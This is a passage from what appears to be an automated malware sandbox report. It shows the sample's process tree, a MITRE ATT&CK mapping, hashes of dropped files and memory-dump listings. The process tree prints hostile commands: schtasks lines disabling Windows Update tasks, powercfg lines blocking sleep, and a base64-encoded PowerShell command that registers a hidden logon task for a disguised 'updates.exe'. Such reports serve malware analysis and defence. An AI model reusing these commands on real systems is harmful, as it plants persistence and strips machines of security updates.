SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:4072

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:3328

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:4184

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:4180

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:4208

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:3160

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:2492

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:3788

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:4808

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:4800

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:4224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAbwBuAGUAZAByAGkAdgBlAHMAXAB1AHAAZABhAHQAZQBzAC4AZQB4AGUAIgAnACkAIAA8ACMAbwBiAHAAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGEAcAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHgAbQBsACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBPAG4AZQBEAHIAaQB2AGUAcwBTAHkAcwB0AGUAbQBzACcAIAAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBqAHYAIwA+ADsA"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4784

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "stopjduuhfz"
2⤵
PID:4320

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e6619990ab7c79dcb1fe7045a6861a7c

SHA1
f8754f704578daa26fd0dc9366f6b7f9d180db5d

SHA256
beb6855c38d42db6f2f1f149a09970eea6aa664f145f6aedb3b87ae828411fc2

SHA512
99fc5258f0fdda9cd5b194d2083749a1d53cccf705db479822320bc0c53b1c31ad2ff07bcb089f63fbe03545f2bf3935fc61f96ade33f312eb7cbb1292c6a82d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
28da6537d68cf570ec313d03c9228b32

SHA1
81304f69af0b76047d4f55092f7c72ef8720b1bf

SHA256
8e193bae02f49ba784cd37e6e1ca2f4a91dc1043f58f7b06300f809404ed7c02

SHA512
ab3f7a20b77fe421afe5ef26018db37423af483dab2f097179a1cf68736ca274ff8d16dcf0f514e7e561a8e28275d20ca5e195b19a58b654c60f2a7b1dd67f58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
65a15f6c9464167c6e8ac1ab275e8f2a

SHA1
50d77247b262e76f0ad3551d7c29d2464b11a082

SHA256
2e469156f4329c3ffab494824102dd2f715e4753f62cfcb69db154394d88eb58

SHA512
d5290b8506e8d29f952e119a3f1c77d02b94996803a9f238ebc39e686312e1f7fb8b70443a9f12c5aaf7acfb15532b8c585493534a61c22f6579a5ebddc8ae69

Download Submit
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
Filesize
2.2MB

MD5
d5dfb8447ced11274942ace31b4279d8

SHA1
5a1b36ef9db72321b3d075712a8888bd921a472c

SHA256
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

SHA512
92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde

Download Submit
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
Filesize
2.2MB

MD5
d5dfb8447ced11274942ace31b4279d8

SHA1
5a1b36ef9db72321b3d075712a8888bd921a472c

SHA256
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

SHA512
92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
5KB

MD5
0684960f1127625c7a987862df0a9047

SHA1
8827566f52b386062aee1cb853a91bede04299b2

SHA256
c10285503e78eacbaa3c00e31a8811afbeaaa07049cc650b6ce961164ba497da

SHA512
143cf0a46f6afda8e796eebf3be8e08fbc8c46c45236988ef678aa3f0d1e4ba44130fbd3d63e5abff4e4419f006f378f2a5dc2ef3b152524502c489fa32d2401

Download Submit
memory/416-216-0x0000000000000000-mapping.dmp

Download
memory/512-215-0x0000000000000000-mapping.dmp

Download
memory/852-221-0x0000000000000000-mapping.dmp

Download
memory/896-214-0x0000000000000000-mapping.dmp

Download
memory/1108-219-0x0000000000000000-mapping.dmp

Download
memory/1184-297-0x0000000000000000-mapping.dmp

Download
memory/1232-178-0x0000000000000000-mapping.dmp

Download
memory/1240-218-0x0000000000000000-mapping.dmp

Download
memory/1300-162-0x0000000000000000-mapping.dmp

Download
memory/1476-220-0x0000000000000000-mapping.dmp

Download
memory/1604-160-0x0000000000000000-mapping.dmp

Download
memory/1668-163-0x0000000000000000-mapping.dmp

Download
memory/1732-298-0x0000000000000000-mapping.dmp

Download
memory/1788-126-0x0000023D53EE0000-0x0000023D53F56000-memory.dmp

Filesize
472KB

Download
memory/1788-118-0x0000000000000000-mapping.dmp

Download
memory/1788-123-0x0000023D53D30000-0x0000023D53D52000-memory.dmp

Filesize
136KB

Download
memory/1932-305-0x0000000000000000-mapping.dmp

Download
memory/1992-262-0x0000000000000000-mapping.dmp

Download
memory/2000-164-0x0000000000000000-mapping.dmp

Download
memory/2000-299-0x0000000000000000-mapping.dmp

Download
memory/2104-272-0x0000000000000000-mapping.dmp

Download
memory/2108-263-0x0000000000000000-mapping.dmp

Download
memory/2272-300-0x0000000000000000-mapping.dmp

Download
memory/2492-257-0x0000000000000000-mapping.dmp

Download
memory/2716-117-0x000000001C580000-0x000000001C79A000-memory.dmp

Filesize
2.1MB

Download
memory/2716-116-0x00000000003D0000-0x0000000000604000-memory.dmp

Filesize
2.2MB

Download
memory/2848-256-0x0000000000000000-mapping.dmp

Download
memory/3040-159-0x0000000000000000-mapping.dmp

Download
memory/3260-207-0x0000000000000000-mapping.dmp

Download
memory/3328-311-0x0000000000000000-mapping.dmp

Download
memory/3368-282-0x0000000000000000-mapping.dmp

Download
memory/3424-306-0x0000000000000000-mapping.dmp

Download
memory/3472-158-0x0000000000000000-mapping.dmp

Download
memory/3592-154-0x0000000000000000-mapping.dmp

Download
memory/3728-277-0x0000000000000000-mapping.dmp

Download
memory/3736-206-0x0000000000000000-mapping.dmp

Download
memory/3788-260-0x0000000000000000-mapping.dmp

Download
memory/3864-259-0x0000000000000000-mapping.dmp

Download
memory/4060-157-0x0000000000000000-mapping.dmp

Download
memory/4072-310-0x0000000000000000-mapping.dmp

Download
memory/4144-205-0x0000000000000000-mapping.dmp

Download
memory/4172-184-0x0000000000000000-mapping.dmp

Download
memory/4180-313-0x0000000000000000-mapping.dmp

Download
memory/4184-312-0x0000000000000000-mapping.dmp

Download
memory/4192-183-0x0000000000000000-mapping.dmp

Download
memory/4208-314-0x0000000000000000-mapping.dmp

Download
memory/4224-275-0x0000000000000000-mapping.dmp

Download
memory/4320-322-0x0000023981490000-0x0000023981496000-memory.dmp

Filesize
24KB

Download
memory/4320-325-0x00000239811B0000-0x00000239811C1000-memory.dmp

Filesize
68KB

Download
memory/4320-320-0x0000023981470000-0x0000023981482000-memory.dmp

Filesize
72KB

Download
memory/4388-173-0x0000000000000000-mapping.dmp

Download
memory/4436-156-0x0000000000000000-mapping.dmp

Download
memory/4440-308-0x0000000000000000-mapping.dmp

Download
memory/4440-171-0x0000000000000000-mapping.dmp

Download
memory/4460-213-0x0000000000000000-mapping.dmp

Download
memory/4468-177-0x0000000000000000-mapping.dmp

Download
memory/4508-210-0x0000000000000000-mapping.dmp

Download
memory/4548-212-0x0000000000000000-mapping.dmp

Download
memory/4584-323-0x0000000001350000-0x0000000001362000-memory.dmp

Filesize
72KB

Download
memory/4584-315-0x0000000001320000-0x000000000132A000-memory.dmp

Filesize
40KB

Download
memory/4652-204-0x0000000000000000-mapping.dmp

Download
memory/4676-217-0x0000000000000000-mapping.dmp

Download
memory/4684-211-0x0000000000000000-mapping.dmp

Download
memory/4784-261-0x0000000000000000-mapping.dmp

Download
memory/4800-271-0x0000000000000000-mapping.dmp

Download
memory/4808-264-0x0000000000000000-mapping.dmp

Download
memory/4884-265-0x0000000000000000-mapping.dmp

Download
memory/4928-161-0x0000000000000000-mapping.dmp

Download
memory/4968-309-0x0000000000000000-mapping.dmp

Download
memory/5004-174-0x0000000000000000-mapping.dmp

Download
memory/5040-155-0x0000000000000000-mapping.dmp

Download
memory/5100-266-0x0000000000000000-mapping.dmp

Download
memory/5104-169-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads